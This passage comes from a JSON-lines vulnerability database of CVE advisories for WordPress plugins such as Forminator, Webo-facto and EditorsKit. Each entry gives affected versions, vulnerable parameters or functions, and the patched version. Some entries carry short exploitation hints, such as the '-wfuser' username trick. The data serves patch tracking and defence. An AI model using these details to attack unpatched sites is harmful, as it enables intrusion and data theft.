version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190826%40xl-tab&new=3190826%40xl-tab&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190826%40xl-tab&new=3190826%40xl-tab&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36715","slug":"easy-login-woocommerce","versionEndExcluding":"1.5","description":"The Login\/Signup Popup plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions in versions up to, and including, 1.4. This makes it possible for authenticated attackers to inject arbitrary web scripts into the plugin settings that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96d264fe-e7e1-4eec-b235-9d288bc5a22f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96d264fe-e7e1-4eec-b235-9d288bc5a22f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-login-signup-popup-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-login-signup-popup-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2304979\\\/easy-login-woocommerce\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2304979\\\/easy-login-woocommerce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11178","slug":"otp-login","versionImpact":"1.4.2","versionEndExcluding":"1.5","description":"The Login With OTP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.4.2. This is due to the plugin generating too weak OTP, and there\u2019s no attempt or time limit. This makes it possible for unauthenticated attackers to generate and brute force the 6-digit numeric OTP that makes it possible to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3775d48-5985-475e-8fb9-c4c5fd044772?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3775d48-5985-475e-8fb9-c4c5fd044772?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3891","slug":"wp-fullcalendar","versionEndExcluding":"1.5","description":"The WP FullCalendar WordPress plugin before 1.5 does not ensure that the post retrieved via an AJAX action is public and can be accessed by the user making the request, allowing unauthenticated attackers to get the content of arbitrary posts, including draft\/private as well as password-protected ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a69965d-d243-4d51-b7a4-d6f4b199abf1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a69965d-d243-4d51-b7a4-d6f4b199abf1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6271","slug":"community-events","versionImpact":"1.4.9","versionEndExcluding":"1.5","description":"The Community Events WordPress plugin before 1.5 does not have CSRF check in place when deleting events, which could allow attackers to make a logged in admin delete arbitrary events via a CSRF attack","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44d9d085-34cb-490f-a3f5-f9eafae85ab8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44d9d085-34cb-490f-a3f5-f9eafae85ab8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13748","slug":"ultimate-classified-listings","versionImpact":"1.4","versionEndExcluding":"1.5","description":"The Ultimate Classified Listings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Title parameter in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/inc\\\/helpers.php#L407\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-classified-listings\\\/tags\\\/1.4\\\/inc\\\/helpers.php#L407\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c925848-1ba7-4009-93c2-1648dbf808e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c925848-1ba7-4009-93c2-1648dbf808e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11436","slug":"pie-forms-for-wp","versionImpact":"1.4.19","versionEndExcluding":"1.5","description":"The Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.4.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202800\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3202800\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125a1d8d-8cd9-439c-b765-198ad369f987?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/125a1d8d-8cd9-439c-b765-198ad369f987?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5071","slug":"sitekit","versionImpact":"1.4","versionEndExcluding":"1.5","description":"The Sitekit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sitekit_iframe' shortcode in versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970788\\\/sitekit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970788\\\/sitekit\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/011c8a06-298e-4a53-9ef8-552585426d79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/011c8a06-298e-4a53-9ef8-552585426d79?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sitekit\\\/trunk\\\/inc\\\/sitekit-shortcode-iframe.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sitekit\\\/trunk\\\/inc\\\/sitekit-shortcode-iframe.php#L3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7638","slug":"forminator","versionImpact":"1.45.0","versionEndExcluding":"1.45.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to time-based SQL Injection via the `order_by` parameter in all versions up to, and including, 1.45.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.45.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.45.0\\\/library\\\/model\\\/class-form-entry-model.php#L2561\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.45.0\\\/library\\\/model\\\/class-form-entry-model.php#L2561\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f5a1eb3-3fda-49de-aefb-2205c9ca3520?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f5a1eb3-3fda-49de-aefb-2205c9ca3520?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3112","slug":"quotes-and-tips","versionImpact":"1.44","versionEndExcluding":"1.45","description":"The Quotes and Tips by BestWebSoft WordPress plugin before 1.45 does not properly validate image files uploaded, allowing high privilege users such as admin to upload arbitrary files on the server even when they should not be allowed to (for example in multisite setup)","recommendation":"Update to version 1.45, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa6f01d6-aa3b-4452-9c5f-49bb227fea9d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa6f01d6-aa3b-4452-9c5f-49bb227fea9d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6464","slug":"forminator","versionImpact":"1.44.2","versionEndExcluding":"1.44.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.44.2 via deserialization of untrusted input in the 'entry_delete_upload_files' function. This makes it possible for unauthenticated attackers to inject a PHP Object through a PHAR file. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. Deserialization occurs when the form submission is deleted, whether by an Administrator or via auto-deletion determined by plugin settings.","recommendation":"Update to version 1.44.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1263\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1263\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fforminator&old=3319860&new_path=%2Fforminator&new=3319860&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fforminator&old=3319860&new_path=%2Fforminator&new=3319860&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6707aa4c-c652-42c0-bdb9-00be984e7271?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6707aa4c-c652-42c0-bdb9-00be984e7271?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6463","slug":"forminator","versionImpact":"1.44.2","versionEndExcluding":"1.44.3","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'entry_delete_upload_files' function in all versions up to, and including, 1.44.2. This makes it possible for unauthenticated attackers to include arbitrary file paths in a form submission. The file will be deleted when the form submission is deleted, whether by an Administrator or via auto-deletion determined by plugin settings. This can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 1.44.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/trunk\\\/library\\\/model\\\/class-form-entry-model.php#L1249\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319860\\\/forminator#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3319860\\\/forminator#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc9b4cb-d36b-4693-a7b9-1dad123b6639?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6dc9b4cb-d36b-4693-a7b9-1dad123b6639?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4776","slug":"cc-child-pages","versionEndExcluding":"1.43","description":"The CC Child Pages WordPress plugin before 1.43 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5ea8f7f-7d5a-4b2e-a070-a9aef7cac58a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d5ea8f7f-7d5a-4b2e-a070-a9aef7cac58a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3487","slug":"forminator","versionImpact":"1.42.0","versionEndExcluding":"1.42.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018limit\u2019 parameter in all versions up to, and including, 1.42.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.42.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.loader.js#L320\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.loader.js#L320\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.multi.js#L1006\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/assets\\\/js\\\/front\\\/front.multi.js#L1006\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5039d63b-377d-435a-be31-4ae81ea30dd3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5039d63b-377d-435a-be31-4ae81ea30dd3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3479","slug":"forminator","versionImpact":"1.42.0","versionEndExcluding":"1.42.1","description":"The Forminator Forms \u2013 Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Order Replay in all versions up to, and including, 1.42.0 via the 'handle_stripe_single' function due to insufficient validation on a user controlled key. This makes it possible for unauthenticated attackers to reuse a single Stripe PaymentIntent for multiple transactions. Only the first transaction is processed via Stripe, but the plugin sends a successful email message for each transaction, which may trick an administrator into fulfilling each order.","recommendation":"Update to version 1.42.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/library\\\/modules\\\/custom-forms\\\/front\\\/front-action.php#L964\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.41.2\\\/library\\\/modules\\\/custom-forms\\\/front\\\/front-action.php#L964\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3274844\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c873c04e-516e-41ee-a295-b8c5235abc1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c873c04e-516e-41ee-a295-b8c5235abc1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8853","slug":"webo-facto-connector","versionImpact":"1.40","versionEndExcluding":"1.41","description":"The Webo-facto plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 1.40 due to insufficient restriction on the 'doSsoAuthentification' function. This makes it possible for unauthenticated attackers to make themselves administrators by registering with a username that contains '-wfuser'.","recommendation":"Update to version 1.41, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1280ceb-9ce8-47fc-8fd3-6af80015dea9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1280ceb-9ce8-47fc-8fd3-6af80015dea9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webo-facto-connector\\\/tags\\\/1.40\\\/WeboFacto\\\/Sso.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webo-facto-connector\\\/tags\\\/1.40\\\/WeboFacto\\\/Sso.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153062\\\/webo-facto-connector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3153062\\\/webo-facto-connector\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13455","slug":"igumbi-online-booking","versionImpact":"1.40","versionEndExcluding":"1.41","description":"The igumbi Online Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'igumbi_calendar' shortcode in all versions up to, and including, 1.40 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.41, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243431%40igumbi-online-booking&new=3243431%40igumbi-online-booking&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3243431%40igumbi-online-booking&new=3243431%40igumbi-online-booking&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b21f9cfa-8113-42bc-a9dc-4d891bd9821b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b21f9cfa-8113-42bc-a9dc-4d891bd9821b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6635","slug":"block-options","versionImpact":"1.40.3","versionEndExcluding":"1.40.4","description":"The EditorsKit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation on the 'import_styles' function in versions up to, and including, 1.40.3. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.40.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4528f9a1-7027-4aa9-b006-bea84aa19c84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4528f9a1-7027-4aa9-b006-bea84aa19c84?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-options\\\/tags\\\/1.40.3\\\/includes\\\/addons\\\/styles-manager\\\/rest-api\\\/gutenberghub-styles-import-export-controller.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/block-options\\\/tags\\\/1.40.3\\\/includes\\\/addons\\\/styles-manager\\\/rest-api\\\/gutenberghub-styles-import-export-controller.php#L100\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010794\\\/block-options\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3010794\\\/block-options\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4718","slug":"page-builder-add","versionEndExcluding":"1.4.9.9","description":"The Landing Page Builder WordPress plugin before 1.4.9.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04d7cd44-9e18-42b9-9f79-cc9cd6980526\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/04d7cd44-9e18-42b9-9f79-cc9cd6980526\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3546","slug":"wp-migration-duplicator","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"The WordPress Backup & Migration plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the wp_mgdp_populate_popup function in all versions up to, and including, 1.4.8. This makes it possible for authenticated attackers, with subscriber access or above, to invoke this function and access log files maintained by the plugin. Additionally, the file name is user-provided and not properly sanitized, which allows attackers to read arbitrary log files on the file system.","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/339c4eba-fa34-4db6-be4b-bcf0ba98121a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/339c4eba-fa34-4db6-be4b-bcf0ba98121a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073573%40wp-migration-duplicator%2Ftrunk&old=3049128%40wp-migration-duplicator%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3073573%40wp-migration-duplicator%2Ftrunk&old=3049128%40wp-migration-duplicator%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5167","slug":"cm-email-blacklist","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"The CM Email Registration Blacklist and Whitelist WordPress plugin before 1.4.9 does not have CSRF check when adding or deleting an item from the blacklist or whitelist, which could allow attackers to make a logged in admin add or delete settings from the blacklist or whitelist menu via a CSRF attack","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67bb5ab8-4493-4f5b-a989-41576675b61a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/67bb5ab8-4493-4f5b-a989-41576675b61a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-37918","slug":"coneblog-widgets","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPCone.Com ConeBlog \u2013 WordPress Blog Widgets allows Stored XSS.This issue affects ConeBlog \u2013 WordPress Blog Widgets: from n\/a through 1.4.8.","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/coneblog-widgets\\\/wordpress-coneblog-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/coneblog-widgets\\\/wordpress-coneblog-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4832","slug":"agile-store-locator","versionEndExcluding":"1.4.9","description":"The Store Locator WordPress plugin before 1.4.9 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/735a33e1-63fb-4f17-812c-3e68709b5c2c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/735a33e1-63fb-4f17-812c-3e68709b5c2c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5308","slug":"podcast-subscribe-buttons","versionImpact":"1.4.8","versionEndExcluding":"1.4.9","description":"The Podcast Subscribe Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'podcast_subscribe' shortcode in versions up to, and including, 1.4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.4.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podcast-subscribe-buttons\\\/tags\\\/1.4.8\\\/template-parts\\\/inline-button.php#L30\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/podcast-subscribe-buttons\\\/tags\\\/1.4.8\\\/template-parts\\\/inline-button.php#L30\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2973904\\\/podcast-subscribe-buttons#file529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2973904\\\/podcast-subscribe-buttons#file529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dbfb82-e380-464a-bfaf-2d0f6bf07f25?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17dbfb82-e380-464a-bfaf-2d0f6bf07f25?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
